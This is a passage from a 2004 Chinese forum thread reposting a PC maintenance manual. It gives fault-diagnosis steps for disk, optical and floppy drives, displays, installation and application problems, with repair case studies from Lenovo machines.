              a) 检查磁盘上的分区是否正常、分区是否激活、是否格式化、系统文件是否存在或完整；
              b) 对于不能分区、格式化xx作的硬盘，在无病毒的情况下，应更换硬盘。更换仍无效的，应检查软件最小系统下的硬件部件是否有故障；
              c) 必要时进行修复或初始化xx作，或完全重新安装xx作系统；
              D. 系统环境与设置检查：参考启动类故障判断要点中的相关部分。
              a) 注意检查系统中是否存在病毒，特别是引导型病毒（如用查KV3000 /K命令，或用MEM.EXE命令等进行检查）；
              b) 认真检查在xx作系统中有无第三方磁盘管理软件在运行；设备管理器中对IDE通道的设置是否恰当；
              c) 是否开启了不恰当的服务。在这里要注意的是，ATA驱动在有些应用下可能会出现异常，建议将其卸载后查看异常现象是否消失；
              E. 硬盘性能检查：
              a)
              当加电后，如果硬盘声音异常、根本不工作或工作不正常时，应检查一下电源是否有问题、数据线是否有故障、BIOS设置是否正确等，然后再考虑硬盘本身是否有故障；

              b) 应使用相应硬盘厂商提供的硬盘检测程序检查硬盘是否有坏道或其它可能的故障；
              F. 对于关于硬盘保护卡所引起的问题，应从以下几方面考虑：
              a)
              安装硬盘保护卡，应注意将CMOS中的病毒警告关闭、将CMOS中的映射地址设为不使用（disable）、将CMOS中的第一启动设备为设为LAN；光驱和硬盘应接在不同的IDE数据线上。

              b)
              如果忘记的硬盘保护卡的管理员密码，对于1.0版ALT+133，ALT+144，ALT+155，弹出10组数（必须用小键盘），对于3.0版，在管理员密码处输入ENPQ，得到一组数据，然后拨打800，来得到密码；

              c) 装有硬盘保护卡的机器，开机出现红屏现象，应使用专用的工具程序解决。方法请参阅相关的《技术工程信息通报》；
              d)
              对于在某个引导盘下，看不到某些数据盘的情况，要检查：这些数据盘是否为该引导盘专属的数据盘；分区类型是否为引导盘的xx作系统所识别；在大于8GB的硬盘上，在8GB之后是否建立了属于该引导盘的FAT16分区（当然引导盘支持FAT16文件系统）；该引导盘的专属分区是否多于3
              个；
              e)
              硬盘保护卡不起保护功能，要检查用户是否关闭了硬盘保护功能，要启用硬盘保护功能，可在进入系统前按一下F4来启用（事先应已安装过），如果不行，可重新插拔一下硬盘保护卡。在Windows下，则应检查其驱动软件是否已安装；

              f)
              当启有了硬盘保护功能后，硬盘上原来的系统不被保留，应询部用户原系统是否是用第三方软件进行的分区。目前硬盘保护卡只能保护用xx作系统自带的FDISK进行分区的系统；

              g)
              在硬盘保护模式为每次还原，如果由于未正常关机，而出现多次提示进行磁盘扫描，应在管理员模式下，在Msdos.sys文件中加入autoscan=0的项；

              h) 对于在使用者模式下，出现乱码的现象，需在管理员模式下运行升级盘中的SETUP.EXE；
              3、 软盘驱动器
              1) 环境检查
              A. 软驱的在一定情况下，类似于硬盘的检查方法。
              B. 检查软驱的连接：
              a) 连接电缆安装是否正确，不应有插错或插反的现象；
              b) 软驱连接的位置，应与BIOS中设置的值相符；
              c) 软驱的电源连接是否正确。
              C. 软驱外观检查
              a) 软驱中是否有异物；
              b) 电路板上及其元器件是否有变形、变色、异味等现象。
              D. 所使用的软盘介质的质量是否太差；
              2) 故障判断要点
              A. 软驱的检查，应在软件最小系统中加入软驱，或去掉硬盘后进行检查判断。且在必要时，移出机箱外检查；
              B. 类似硬盘驱动器的检查。但要注意：BIOS中对软驱是否可读写的设置是否为允许或禁止；
              C.
              检查软驱的读、写能力，一方面是自身读写能力的检查，另一方面是软盘的互换读写能力的检查，即在可能有故障的软驱中写过的软盘能否在另一正常的软驱中读出。如果不能，更换软驱；

              D. 软盘是最易感染病毒的介质，因此的检查中，一定要注意对病毒的检查。
              4、 光盘驱动器
              1) 环境检查
              A. 检查光驱连接：
              a) 光驱上的ID跳线是否正确，它应与连接在线缆上的位置匹配；
              b) 连接光驱的数据线是否接错或接反；
              c) 光驱连接线是否有破损或硬折痕。可通过更换连接线检查；
              d) 光驱连接线类型是否与光驱的技术规格要求相符；
              e) 光驱电源是否已正确连接，不应有过松或插不到位的现象。
              B. 光驱外观检查：
              b) 光驱电路板上的元器件是否有变形、变色，及断裂缺损等现象；
              c) 光驱电源插座之接针是否有虚焊或脱焊现象；
              d) 加电后，光驱自检时指示灯是否不亮或常亮；工作时指示灯是否能正常闪亮；
              e) 加电后，要倾听光驱驱动器的运转声音是否正常，不应有异常的声响及过大的噪音。
              2) 故障判断要点
              A.
              光驱的检查，应用光驱替换软件最小系统中的硬盘进行检查判断。且在必要时，移出机箱外检查。检查时，用一可启动的光盘来启动，以初步检查光驱的故障。如不能正常读取，则在软件最小系统中检查。最先考察的是光驱；

              B. 类似硬盘驱动器的检查方法；
              C. 光驱性能检查：
              a)
              对于读盘能力差的故障，先考虑防病毒软件的影响，然后用随机光盘进行检测，如故障复现，更换维修，否则根据用户的需要及所见的故障进行相应的处理；

              b)
              必要时，通过刷新光驱的formware检查不驱的故障现象是否消失（如由于光驱中放入了一张CD光盘，导致系统第一次启动时，光驱工作不正常，就可偿试此方法）；

              D. xx作系统中配置检查：
              a) 在xx作系统下的应用软件能否支持当前所用光驱的技术规格；
              b) 设备管理器中的设置是否正确，IDE通道的设置是否正确。必要时卸载光驱驱动重启，以便让xx作系统重新识别。
              五、本类故障的判断流程
              见附录一之（三）。
              六、案例
              案例一:
              问题描述：小王是一家公司的计算机维护人员，办公用机为联想的奔月2000机型，13G硬盘，由于长时间电脑中系统和数据未进行维护，系统启动和运行都比较慢，将C盘上的重要数据复制到D盘，之后运行联想的系统恢复软件，将隐藏分区里的Windows98SE系统复制到C盘上。10分钟不到恢复完毕，再次重新启动，正常进入Windows98系统。但是进入系统后，发现原来用PM划分的扩展分区不见了大量的数据资料都在扩展分区中，如何是好？小王陷入尴尬的境地……

              解决方案：首先查看联想机器随机资料，说明书上写着“可能对PM等的分区格式不支持，分区时请用Fdisk……”，可能是进行系统恢复时破坏了原来的硬盘分区表，有没有什么办法解决呢Ｉ诵莫机进入MSDos或者进入PM，出了一个主分区和一个扩展分区没有其他的分区信息，这时想到软件Diskman，进入MSDos，运行Diskman，首先警告说分区表有误，Diskman虽然仍然把硬盘识别成两个分区，但它还有重新检测分区表的功能。重新检测分区表有全自动和交互两种方式，选择后者，Diskman就开始逐柱面检测硬盘上原已存在的分区表。过了很长的时间，原有的三个分区包括联想系统恢复软件隐藏的备份分区都被检测了出来，保持分区格式，一切正常。

              点评：用户应用中或是在用户对硬盘分区时断电都会导致硬盘分区表的错误，遇到此种问题时不要着急，要分析问题的原因，查看相关的资料，如相关软件和计算机附带的资料，借助相关的软件或工具解决，若是对硬盘的工作原理、相关软件或工具的应用不是很了解，一定要查找相关资料或是向人询问。

              注：Diskman硬盘分区表维护软件，运行于MSDOS环境，采用全中文图形界面，无须任何汉字系统支持。以图表的形式揭示了分区表的详细结构，支持鼠标xx作，支持8G以上的大硬盘和UNIX、NTFS等多种分区格式等。

              案例二：
              问题描述：一用户天禧二5311机型，用户反映用随机的软件NTI CD-Maker
              Plus中的FileCD工具格式化可擦写光盘的时候(明基CD-RW)，进度很快到100％，但是没有格式化完毕的提示，强行关闭对话框也无法关闭。最后等了只得结束任务。用NTI
              CD-Maker Plus刻录硬盘，刻录过程中显示刻录进度，并提示刻录完毕后，将刻录好的光盘放入光驱，提示无法识别光盘。
              解决方案：首先考虑是NTI CD-Maker中的插件FileCD的软件问题，升级NTI
              CD-Maker软件到V5.08，V5.13,都没能解决，升级到V5.15现象依旧，再看FileCD的版本和用户原机的FileCD的版本一样，为2.0.10后续的版本并未在擦写光盘的功能上有所改进。考虑选用另外的刻录软件，用NERO来进行测试（版本为V5.5.9.0），用该软件执行快速擦写后再对光盘进行刻录，依旧发生上述的现象。但是用SONY的CD-RW光盘则无此问题。

              点评：擦写光盘时和刻录软件及刻录机都有很大的关系，请工程师在解决问题时可以从多个角度考虑问题。
              案例三：
              问题描述：一用户光驱过保，用户自行购买光驱，据用户称在市场上购买光驱时进行测试，光驱没有任何问题，测试的数据盘和VCD等光盘都可以正常读出，但是回到家加装光驱后，开机进入系统，所有放入光驱中的碟片在驱动器的盘符上都只显示CD样的标记。用户回到购买处将光驱安装到测试机器上，问题复现。

              解决方案：经过检查发现，光驱的数据接口上一根数据线弯，导致驱动器中数据无法正常识别。
              [此贴子已经被作者于2004-1-28 17:12:08编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:53:39新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第8楼

               常见故障判断－－－ 显示类故障
              一、定义举例
              这类故障不仅包含由于显示设备或部件所引起的故障，还包含有由于其它部件不良所引起的在显示方面不正常的现象。也就是说，显示方面的故障不一定就是由于显示设备引起的，应全面进行观察和判断。

              二、可能的故障现象
              1、 开机无显、显示器有时或经常不能加电；
              2、 显示偏色、抖动或滚动、显示发虚、花屏等；
              3、 在某种应用或配置下花屏、发暗（甚至黑屏）、重影、死机等；
              4、 屏幕参数不能设置或修改；
              5、 亮度或对比度不可调或可调范围小、屏幕大小或位置不能调节或范围较小；
              6、 休眠唤醒后显示异常；
              7、 显示器异味或有声音。
              三、可能涉及的部件
              显示器、显示卡及其它们的设置；主板、内存、电源，及其它相关部件。特别要注意计算机周边其它设备及地磁对计算机的干扰。
              四、判断要点/顺序
              1、 维修前的准备
              相应显示卡的最新版驱动程序
              2、 环境检查
              1) 市电检查：
              A. 市电电压是否在220V±10%、50Hz或60Hz；市电是否稳定；
              B. 其余参考加电类故障中有关市电检查部分。
              2) 连接检查：
              A.
              显示器与主机的连接牢伤心、正确（特别注意，当有两个显示端口时，是否连接到正确的显示端口上）；电缆接头的针脚是否有变形、折断等现象，应注意检查显示电缆的质量是否完好；

              B. 显示器是否正确连接上市电，其电源指示是否正确（是否亮及颜色）；
              C. 显示设备的异常，是否与未接地线有关。特别注意：不允许电脑维修工程师为用户安装地线，应请用户通过正式电工来安装；
              3) 周边及主机环境检查：
              A. 检查环境温、湿度是否与使用手册相符（如钻石珑管，要求的使用温度为18~40C）；
              B. 显示器加电后是否有异味、冒烟或异常声响（如爆裂声等）；
              C. 显示卡上的元器件是否有变形、变色，或温升过快的现象；
              D. 显示卡是否插好，可以通过重插、用橡皮或酒精擦拭显示卡（包括其它板卡）的金手指部分来检查；主机内的灰尘是否较多，进行清除；
              E.
              周围环境中是否有干扰物存在（这些干扰物包括：日光灯、UPS、音箱、电吹风机、相伤心过近（50厘米以内）的其它显示器，及其它大功率电磁设备、线缆等）。注意显示器的摆放方向也可能由于地磁的的影响而对显示设备产生干扰；

              F. 对于偏色、抖动等故障现象，可通过改变显示器的方向和位置，检查故障现象能否消失。
              4) 其它检查及注意事项：
              A. 主机加电后，是否有正常的自检与运行的动作（如有自检完成的鸣叫声、硬盘指示灯不停闪烁等），如有，则重点检查显示器或显示卡；
              B. 禁止带电搬动显示器及显示器方向，在断电后的一段时间内（2~3分钟）也最好不要搬动显示器。
              3、 故障判断要点
              1) 调整显示器与显示卡：
              A. 通过调节显示器的OSD选项，最好是回复到RECALL（出厂状态）状态来检查故障是否消失。对于液晶显示器，需按一下auto
              config按钮；
              B. 显示器的参数是否调得过高或过低（如H/V-MOIRE，这是不能通过RECALL来恢复的）；
              C. 显示器各按钮可否调整，调整范围是否偏移显示器的规格要求；
              D.
              显示器的异常声响或异常气味，是否超出了显示器技术规格的要求（如新显示器刚用之时，会有异常的气味；刚加电时由于消磁的原因而引起的响声、屏幕抖动等，但这些都属正常现象）。有关显示器的规格，请见附录二之（二）；

              E. 显示卡的技术规格是否可用在主机中（如AGP 2.0卡是否可用在主机的AGP插槽中等）。
              2) BIOS配置调整：
              A.
              BIOS中的设置是否与当前使用的显示卡类型或显示器连接的位置匹配（即是用板载显示卡、还是外接显示卡；是AGP显示卡还是PCI显示卡）；

              B. 对于不支持自动分配显示内存的板载显示卡，需检查BIOS中显示内存的大小是否符合应用的需要；
              以下的检查应在软件最小系统下进行。
              3) 检查显示器/卡的驱动：
              A. 显示器/卡的驱动程序是否与显示设备匹配、版本是否恰当；
              B. 显示器的驱动是否正确，如果有厂家提供的驱动程序，最好使用厂家的驱动；
              C. 是否加载了合适的Direct X驱动（包括主板驱动）；
              D. 如果系统中装有Direct
              X驱动，可用其提供的Dxdiag.exe命令检查显示系统是否有故障。该程序还可用来对声卡设备进行检查。
              4) 显示属性、资源的检查：
              A. 在设备管理器中检查是否有其它设备与显示卡有资源冲突的情况，如有，先去除这些冲突的设备；
              B. 显示属性的设置是否恰当（如：不正确的监示器类型、刷新速率、分辨率和颜色深度等，会引起重影、模糊、花屏、抖动、甚至黑屏的现象）；

              5) xx作系统配置与应用检查：
              A. 系统中的一些配置文件（如：System.ini文件）中的设置是否恰当；
              B. 显示卡的技术规格或显示驱动的功能是否支持应用的需要；
              C. 是否存在其它软、硬件冲突。
              6) 硬件检查：
              A. 当显示调整正常后，应逐个添加其它部件，以检查是何部件引起显示不正常；
              B. 通过更换不同型号的显示卡或显示器，检查是否存在它们之间的匹配问题；
              C. 通过更换相应的硬件检查是否由于硬件故障引起显示不正常（建议的更换顺序为：显示卡、内存、主板）。
              五、本类故障的判断流程
              见附录一之（四）。
              六、案例
              案例一：
              问题描述：碰到过这样的一台机器，现象比较怪，机型为奔月2000
              PIII/800，故障为经常性的开机无显，有时能显示进入系统，但使用1-2小时会出现死机，重启又无显示，只有过很长时间再开机，才可以显示。

              解决方案：碰到此问题，首先断定应为硬件问题，打开机箱，查看各板卡并无松动（注：显卡与主板插槽上的联想贴条，粘得很紧），换件试吧，先后更换过内存、CPU、电源，均不能解决问题，再换主板吧，拆撕显卡与主板插槽的联想贴条时，感觉到显卡没插到位，向下按，还能再进去一点，遂怀疑是不是显卡与主板接触不良所致，于是又把机器的原部件全都还原，试机，一切正常。

              后记：此案例就是因为显卡的接触不良，而造成的奇怪故障，在维修中因为检测时的疏漏（只查看显卡是否插紧，而未实际动手检查一下），造成了维修过程的繁琐。

              案例二：
              问题描述：一台奔月机器，用户称每次启动都无法进入WIN98，光标停留在屏幕左上角闪动，死机；但安全模式可以进入。
              解决方案：怀疑为显卡或监视器设置不当所致，进入安全模式把显示分辨率设为640*480，颜色设为16色，重启，能以正常模式进入，但只要改动一下分辨率或颜色，则机器就不能正常启动；察看机器内部，除用户自加一块网卡外，别无其它配置，难道是网卡与显卡发生了冲突？拔掉网卡，能正常启动WIN98，给网卡换个插槽，开机检测到新硬件，加载完驱动，启动，一切正常。

              后记：由于显卡与其它部件不兼容或冲突造成的死机，完全可以先采用最小系统化的方法来测试（最小系统化法即只保留主板、CPU、显卡、电源等主要部件），先排除主要的部件，再逐一检测其它扩展卡。

              案例三：
              问题描述：三角洲部队-大地勇士，在810（e）系列主板的机器上运行（同禧、逐日系列），如用随机带的显卡驱动程序安装（而用随机盘进
              行驱动的安装又是我们一贯的作风），在进入游戏画面时，必然会导致死机。
              解决方案：解决方法就是从网上下载新版本的驱动，进行升级。
              后记：如果在实际维修中遇到玩3D游戏死机的故障，估计可能是显卡故障，而又无备件替换时（这在我们上门维修中，是经常遇到的），不妨从网上下载一个Direct
              control软件，通过它屏蔽掉AGP支持。再玩3D游戏，如不出现死机，说明问题很可能出在别处（如主板、内存）。如死机，则在很大程度上说明，这块显卡是有故障的了。

              案例四：
              故障描述: 开天2200 P4/1.7G （为QDI
              P7LI-AL主板），在运行华光超恩组版软件时（带一ISA加密卡），如进行放大显示，则左边界线无法显示。
              解决方案:
              用户新购机器，代理商在为用户安装超恩组版软件时，出现问题。换一新机，故障依旧，代理判断为华光ISA卡与此机型不兼容，让维修站上门解决。到用户处，复现故障，插一PCI显卡则显示正常，估计不为机器故障。在系统属性—性能—图形中，把硬件加速调低两格，问题解决。

              [此贴子已经被作者于2004-1-28 17:12:24编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:55:07新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第9楼

               常见故障判断－－－ 安装类故障
              一、定义举例
              这类故障主要是反映在安装xx作系统或应用软件时出现的故障
              二、可能的故障现象
              1、 安装xx作系统时，在进行文件复制过程中死机或报错；在进行系统配置时死机或报错；
              2、 安装应用软件时报错、重启、死机等（包括复制和配置过程）；
              3、 硬件设备安装后系统异常（如黑屏、不启动等）；
              4、 应用软件卸载后安装不上，或卸载不了等。
              三、可能涉及的部件
              磁盘驱动器、主板、CPU、内存，及其它可能的部件、软件。
              四、判断要点/顺序
              1、 维修前的准备
              1) 注意携带磁盘数据线；
              2) 相适应的最新版设备驱动程序。
              2、 环境检查
              1) 软件安装
              A. 检查硬件设备的连接与外观：
              a) 检查与主机连接的其他设备工作是否正常；
              b) 设备间的连接线是否接错或漏接。连接插头、座的接针是否有变形、缺失、短路等现象；
              c) 仔细检查报错信息，判断可能造成故障的部位；
              d) 观察系统是否有异味，元器件的温度；
              e) CPU风扇的转速是否过慢或不稳定；
              f) 驱动器工作时是否有不正常的声响。
              B. 其它方面检查：
              a) 认真对照软件的使用手册，确认机器的软、硬件配置符合该手册的要求；
              b) 仔细观察安装介质是否完好。
              2) 设备安装
              A. 检查设备的连接与外观：
              a) 要安装的设备、部件是否连接正确，连接电缆是否完好、接针是否有缺针、断针、或短接的现象；
              b) 要安装的设备、部件的制作工艺是否优良；
              c) 余类似上述软件安装。
              B. 驱动程序介质检查：用于安装设备的驱动程序介质是否完好。
              3、 故障判断要点
              1) xx作系统安装：
              A. 检查CMOS中的设置：
              a) 如果需要，请先恢复到出厂设置；
              b) 关闭BootEasy功能、关闭防病毒功能，及关闭BIOS防写开关；
              c) 特别注意硬盘的参数、CPU的温度等。注意观察自检时显示出来的信息是否与实际的硬件配置相符。
              B. 安装介质与目标介质检查：
              a) 检查是否有病毒；
              b) 检查分区表是否正确、分区是否激活。使用Fdisk
              /mbr命令来确保主引导记录是正确的（注意使用此命令后，如果机器不能启动，可证明原系统中存在病毒或有错误。硬盘应做初始化xx作）；
              c) 检查系统中是否有第三方内存驻留程序。
              以下过程，建议在软件最小系统下检查（注：在最小系统下，需要添加与安装有关的其它驱动器）。
              C. 安装过程检查：
              a)
              如果在复制文件时，报CAB等文件错，可偿试将原文件复制到另一介质（如硬盘）上再行安装。如果正常通过，则原安装介质有问题，可去检查介质及相应的驱动器是否有故障；若仍然不能复制，应检查相应的磁盘驱动器、数据线、内存等部件；

              b)
              如果是采用覆盖安装而出现上述问题，建议如果更换安装介质后仍不能排除故障，应先对硬盘进行初始化xx作，再重新安装（初始化xx作时，最好将硬盘分区彻底清除后进行）。如果仍不能解决，再考虑硬件；

              c)
              安装过程中，在检测硬件时出现错误提示、蓝屏或死机等，一是通过多重新启动几次（应该是关机重启），看能否通过；另一是在软件最小系统下检查是否能通过。如果不能通过，应该依次检查软件最小系统中的内存、磁盘、CPU（包括风扇）、电源等部件；如果能正常安装，则是软件最小系统之外的部件的故障或配置问题，这可通过在安装完成后，逐步添加那些部件，并判断是否有故障或配置不当；

              D. 硬件及其它应注意的问题：
              a)
              如果安装系统时重启或掉电，要求在软件最小系统下进行测试。如果故障消失，在安装好系统以后，将软件最小系统之外的设备逐一接上，检查故障是由哪个部件引起，并用替换法解决；如果故障不能消失，应检查软件最小系统中的电源、主板和内存，甚至磁盘驱动器；

              b) 在IDE设备上安装诸如UNIXxx作系统时，或要安装多个xx作系统时，要注意：一是8.4GB
              限制（UNIX的开始部分必须在8.4GB之内）——这一条在SCSI设备上无这一要求；另一是多xx作系统间的安装顺序及配合关系；
              E. 对于LEOS的安装应注意以下几点：
              a) 确保主板BIOS支持LEOS，建议在为用户更换主板后首先就要刷新支持LEOS的BIOS；
              b) 如果为用户更换硬盘，也要注意备件硬盘是否正确支持DMA66。否则在安装LEOS时也会出现问题；
              c)
              LEOS最好是在一块全新未被分区的硬盘上进行安装。具体顺序可以参考如下方案：新硬盘-〉安装LEOS->分区（Fdisk）->安装xx作系统（Windows
              XP）-〉制作一键恢复。如果原硬盘存在分区，可以使用Clear.com程序清楚后再安装LEOS。
              2) 应用软件安装：
              A. 检查安装应用软件问题时应注意的问题：
              a) 应用软件的安装问题，部分可参考上述的xx作系统安装的检查方法；
              b) 在进行安装前，要求先备份注册表，再进行安装；
              B. 软件间、软硬件间的冲突检查：
              a)
              可采用两种软件问题隔离的方法。一是在软件最小系统下，关闭正在运行的应用程序，然后安装需要的应用软件；另一是在原系统下直接关闭正在运行的应用程序，然后安装需要的应用软件。关闭已有的应用的方法是：使用msconfig禁用启动组、autoexec.bat、config.sys、win.ini、system.ini中在启动时调用的程序；

              b) 使用任务管理器，检查系统中有无不正常的进程，并给予杀除；
              c) 对于基本满足软件技术手册要求但安装不上的情况，看能否通过设置调整来解决。如果不能解决，则视为不兼容；
              d) 利用其它机器（最好是不同配置的），检查是否存在软、硬件方面的兼容问题；
              e)
              检查系统中是否已经安装过该软件，如果已经安装过应先将其卸载后再安装，如果无法正常卸载，可以手动卸载或通过恢复注册表来卸载（对于Windows
              XP可使用系统还原功能来卸载）；
              f) 必要时，可从网络上查阅相关资料，之后再与软件厂商联系，看是否有其他的注意事项。
              C. 硬件检查：
              在以上的步骤都不奏效时可考虑硬件问题，应检查光驱、安装介质、硬盘线等配件。
              3) 硬件设备安装：
              A. 冲突检查：
              a)
              所安装的设备、部件是否在系统启动前的自检过程中识别到，或能由xx作系统识别到（非即插即用识备除外）。如果不能识别，应检查BIOS设置及设备本身，包括跳线及相应的插槽或端口；

              b)
              检查新安装的设备与原系统中的设备是否有冲突；通过改变驱动的安装顺序、去除原系统中的相应部件或设备、更换插槽，看故障是否消除。如果不能消除，则为不兼容；

              c) 加装的设备是否与现有系统的技术规格或物理规格匹配；
              d) 检查当前系统中的一些设置（主要是.ini文件中的设置）是否与所安装的部件或设备驱动有不匹配的地方；
              B. 驱动程序检查：所安装的设备驱动是否为合适的版本（即，不一定是最新的）；
              C. 硬件检查：
              a) 所安装的部件或设备是否本身就有故障；
              b) 检查原系统中的部件是否有不良的现象（如插槽损坏、供电能力不足等）。
              五、本类故障的判断流程
              见附录一之（五）。
              六、案例
              案例一：
              问题描述：用户报修天禧6620机器，在安装98过程中，提示剩余三分钟时。Hwinfo报错，无法正常安装。
              解决方案：工程师上门后，经过检测，确实存在用户反应的问题。然后尝试将安装文件拷贝到硬盘上安装和换一张安装盘安装，故障依旧。接着检查BIOS发现，系统日期是2075年。将日期改回后，故障排除。问题虽小，影响却大。在此，提醒各位同仁，做事要细心，不要忽略每个细节。

              案例二：
              问题描述：逐日2000机器，一次突然死机，不能启动，重装系统能成功，但在设备管理里有很多问号，如打印口，COM口等都没有驱动。
              解决方案：在站内又重装系统，驱动主板不能解决问题，看来只有更换主机才行了。打开机箱，发现有很多灰尘，取出主板，进行大扫除，抱着试一试的心里，重装一切OK。

              案例三：
              问题描述：一用户奔月4000机器/PIII 1G，他是单位技术员，说此机不能重装系统，每次重装都死机，要求上门维修。
              解决方案：到达用户处，发现重装到检测硬件时无反应，打开机器进行检查时，发现CPU风扇不是联想。客户说这是刚从市场上拿来的，新的，应没有问题。依次替代硬盘与内存没有用，经用户同意带回站内烤机，再换下主板与CPU还是不行，后经多次重试发现每次死时间越来越短，怀疑还是CPU风扇有问题。换其它联想机器上的风扇竟解决问题。引起故障原因是客户的CPU风扇转速不够，引起温度过高死机。
              [此贴子已经被作者于2004-1-28 17:12:37编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:56:41新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第10楼

               常见故障判断－－－误操作与应用类故障
              一、定义举例
              这类故障主要是指启动完毕后到关机前所发生的应用方面及系统方面的故障。
              二、可能的故障现象
              1、 休眠后无法正常唤醒；
              2、 系统运行中出现蓝屏、死机、非法xx作等故障现象；
              3、 系统运行速度慢；
              4、 运行某应用程序，导致硬件功能失效；
              5、 游戏无法正常运行；
              6、 应用程序不能正常使用。
              三、可能涉及的部件
              主板、CPU、内存、电源、磁盘、键盘、接插的板卡等
              四、判断要点/顺序
              1、 维修前的准备
              1) 干净的可用硬盘；
              2) 杀毒软件；
              3) 尽可能新的驱动程序、若干版本的BIOS；
              4) 磁盘连接的数据线等。
              2、 环境检查
              1) 市电及连接检查：
              A. 检查市电是否正常，连接是否牵伤心；是否有接地；
              B. 设备间的连接线是否接错或漏接。
              2) 周边及外观检查：
              A. 检查与主机连接的其他外设工作是否正常；
              B. 驱动器工作时是否有异响，CPU风扇的转速是否过慢或不稳定；
              C. 观察机箱内灰尘是否太多，而导致各插接件间接触不良。先除尘后可用橡皮等擦拭金手指，去除氧化层或灰尘。然后重新插上；
              D. 观察系统是否有异味，元器件的温升是否过高或过快。
              3) 显示与设置检查：
              A. 详细记录报错信息，判断可能造成故障的部位；
              B. 注意CMOS中对于硬盘、系统时间、CPU温度的设置，注意在自检时显示的硬件信息和机器配置是否相符；
              C. 仔细阅读软件的使用指南，注意软件运行的环境要求。
              4) 充分与用户沟通：
              A. 了解用户的使用情况；
              B. 出故障前的现象；
              C. 做过什么xx作才出现目前的故障。
              根据以上了解的情况，来初步判断可能的故障原因。
              3、 故障判断要点
              1） 检查是否由于用户误xx作引起
              A.
              机器出现死机、蓝屏或无故重启时，首先要考虑到用户的xx作是否符合xx作规范和要求，要仔细询问、观察用户的xx作方法是否符合常理，并由工程师用正确的方法xx作、应用用户的机器，查看是否出现用户所报修的故障。若不出现，则可认为是用户xx作不当引起的，由工程师向用户解释并演示正确的xx作方法。

              B. 若经过上述xx作故障依然存在，可用系统文件检查器检查用户的机器系统是否有丢失的DLL文件，并尝试恢复。
              C.
              注意观察用户的机器在死机、蓝屏或无故重启时有没有规律，并找出可能引起机器故障的原因（如机器在运行某一程序时或机器开机在一定时间内死机）。

              D. 通过与另一台软硬件相同且无故障的机器进行比较，查看故障机的文件大小是否相同或相差不大，主程序的版本是否一致。
              2） 检查是否由于病毒或防病毒程序引起故障
              A. 检查用户的机器是否被病毒感染，使用杀毒软件杀毒；
              B. 检查用户是否安装了两个或两个以上的防毒软件，建议用户使用其中一个，并卸载其他的防毒软件；
              C. 检查是否有木马程序，用最新版的杀毒程序可以查出木马程序。可以通过安装补丁来弥补程序中的安全漏洞，或者安装防火墙。
              3） 检查是否由于xx作系统问题引起故障
              A. 检查硬盘是否有足够的剩余空间，并检查临时文件是否太多。整理硬盘空间，删除不需要的文件；
              B. 对于系统文件损坏或丢失，可以使用系统文件检查器进行检查和修复；
              C. 检查xx作系统是否安装了合适的系统补丁（对于Winnt可在启动时观察service
              pack的版本，推荐使用SP6；Win2k和Winxp可以在系统属性中查看，Win2k推荐使用SP3，Winxp推荐使用SP1。）；

              D. 检查DirectX驱动是否正常，升级DirectX的版本；
              E. 检查是否正确安装了设备的驱动程序，并且驱动的版本是否合适。检查驱动安装的顺序是否正确（例如：首先安装主板驱动）。
              4） 检查是否由软件冲突、兼容引起故障
              A.
              检查用户应用软件的运行环境是否与现有的xx作系统（NT/98/2K/XP）相兼容，可通过查看软件说明书或到应用软件网页上查找相关资料，并查看网页上有没有对于此软件的升级程序或补丁可安装。

              B. 可用任务管理器观察故障机器的后台是否有不正常的程序在运行，并尝试关闭程序只保留最基本的后台程序。
              C. 注意查看故障机内是否有共用的DLL文件，可通过改变安装顺序或安装目录来解决问题。
              5） 检查硬件设置是否不正确
              A. 首先，检查CMOS设置是否正确，可恢复默认值；
              B. 在设备管理器中检查硬件是否正常，中断是否有冲突，如有冲突，调整系统资源（对于某些硬件，要阅读说明书，按照说明正确设置硬件）；
              C. 在设备管理器中将硬件驱动删除，重新安装驱动程序（最好安装版本正确的驱动程序），查看硬件驱动是否恢复正常；
              D. 运行硬件检测程序，如AMI等检测硬件是否有故障；
              E. 在软件最小系统情况下， 重新更新硬件驱动，观察故障是否消失。
              6） 检查是否为兼容问题
              A.
              遇到兼容性问题时，应检查硬件的规格和标准（如同时使用多条内存时检查内存是否为同一厂家、同一规格、同一容量、内存颗粒同一批次），是否允许在一起使用。

              B. 阅读说明书或到网页上查找相关资料，检查用户的硬件正常使用所需的软件要求，现在的软件环境是否符合要求，软硬件之间是否相互支持。
              C. 在设备管理器中检查用户的系统资源是否有冲突，如有冲突，手动调整系统源。
              D.
              在设备管理器中检查用户机器的硬件的驱动是否安装正确，更新合适版本的设备驱动（如某些显卡用WIN2000或WINXP自带的公版驱动，会造成某些大型3D游戏无法运行）；

              E. 检查维修BOM，去除非联想的硬件，检查系统是否可正常工作，如可正常工作，建议用户更换自行添加的硬件或查找硬件相关资料进行解决。

              7） 检查是否由于网络故障引起
              A.
              碰到机器连接在网络上，出现死机、运行慢、蓝屏等故障时，应首先关闭网络，与网络环境隔离，观察故障是否消失，如故障消失，则为网络问题引起故障。

              B. 确为网络问题引起的故障，其判断与解决步骤参考网络部分。
              8） 检查是否由于硬件性能不佳或损坏引起
              A. 使用相应的硬件检测程序，检查硬件是否有故障，如果有，利用替换法排除相应的硬件；
              B. 用替换法检查检测程序无法判断的硬件故障。
              附：在IE中删除临时文件可用以下几种办法：
              1、
              打开IE浏览器，在工具—internet选项中删除临时文件，清空历史记录。（对于IE无法打开的可在这项里的设置中选“每次启动Internet
              Explorer”，或将Internet临时文件夹使用的磁盘空间加大；
              2、 在开始—设置—任务栏和开始菜单—开始菜单程序中选清除；
              3、 在c:\windows\history目录中将历史记录删除；
              4、 在c:\windowsTemporary Internet Files中删除所有文件；
              5、 使用网络实铭等第三方软件进行清除。

              [此贴子已经被作者于2004-1-28 17:13:12编辑过]

        ----------------------------------------------
        欢迎访问BT之家
